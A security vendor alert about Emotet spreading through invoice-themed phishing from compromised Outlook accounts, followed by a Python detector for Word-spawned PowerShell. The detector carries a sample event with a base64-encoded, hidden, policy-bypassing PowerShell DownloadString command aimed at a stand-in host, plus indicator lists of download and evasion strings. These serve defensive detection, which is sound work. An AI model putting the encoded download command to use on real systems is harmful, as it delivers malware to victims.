Not only does the latest version of Emotet steal a variety of credentials from its victims, it also raids their Outlook account for names and email addresses, then uses them to send out spam messages designed to spread the infection.
A new wave of Emotet trojan infections is spreading via phishing emails sent from compromised Outlook accounts.
The emails are disguised to look like invoice notices sent by contacts the recipient has emailed in the past, perhaps even recently. They include a link that downloads a malicious Word document.
Emotet has traditionally been recognized as a banking trojan, though in this case it appears to be serving as more of a general credential stealer and potentially a downloader for additional malware.
These attacks rely on an Office macro hidden in the "invoice" Word doc to download the Emotet payload using a PowerShell command. Barkly sees that suspicious behavior and blocks it before the command can be completed. Watch for yourself in the video below:
Phishing emails with fake invoices aren't exactly a new threat, but when they come from a vendor your company uses they can be convincing. Share this alert with your users so they can be especially wary of this threat, and if possible, consider disabling macros by default across your organization.
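For defenders who want to catch the macro-to-PowerShell chain described above, here is an added detection example that is not part of Barkly's post: it scores process-creation events (Sysmon Event ID 1 style fields) for an Office application spawning a script host, and decodes PowerShell -EncodedCommand arguments so that download indicators hidden behind base64 still match. The field names, indicator lists, severity scheme and sample events are assumptions constructed for this example.

```python
import base64
import re
# Office apps should not normally launch a script host: that is the macro -> PowerShell chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_INDICATORS = ("downloadstring", "downloadfile", "net.webclient", "invoke-webrequest", "http://", "https://")
EVASION_INDICATORS = ("-enc", "hidden", "-nop", "bypass")
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)  # -enc / -EncodedCommand

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmd):
    # PowerShell -EncodedCommand takes base64 of UTF-16LE text; decode it so URLs become visible.
    m = ENCODED_ARG.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "ignore")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_event(event):
    parent, child = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return {"alert": False, "severity": 0, "reasons": []}
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    haystack = (cmd + " " + decoded).lower()   # match indicators in both raw and decoded text
    reasons, severity = [f"{parent} spawned {child}"], 1
    if any(i in haystack for i in DOWNLOAD_INDICATORS):
        reasons.append("download indicator"); severity += 1
    if any(i in haystack for i in EVASION_INDICATORS):
        reasons.append("hidden/encoded/bypass launch"); severity += 1
    return {"alert": True, "severity": severity, "reasons": reasons}

def scan(events):
    # One alert per matching event, tagged with its ProcessId for triage.
    return [{"pid": e.get("ProcessId"), **r} for e in events if (r := score_event(e))["alert"]]

# Constructed sample events in Sysmon Event ID 1 style; not real telemetry from this campaign.
_ENC = base64.b64encode("(New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc {_ENC}"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]
```

Running `scan(SAMPLE_EVENTS)` flags only the Word-spawned PowerShell event; the benign Explorer-launched script is ignored.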